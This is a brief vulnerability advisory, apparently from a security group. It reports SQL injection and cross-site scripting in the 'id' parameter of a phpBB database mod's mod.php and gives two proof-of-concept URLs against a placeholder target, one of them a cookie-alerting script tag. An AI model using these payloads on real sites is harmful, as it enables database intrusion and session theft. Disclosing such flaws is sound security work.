vulnerable mod:
datenbank
explaination:
you can pass SQL Injection / Cross Site Scripting (Commands) in the id variable inside the
mod.php (mod-datenbank)
exploit:
http://[target]/phpBB/moddb/mod.php?id='[SQL Injection]
http://[target]/phpBB/moddb/mod.php?id='><script>alert(document.cookie)
</script>
this bugs discovered by : neO
SGT SecurityGurus Team
www.securitygurus.net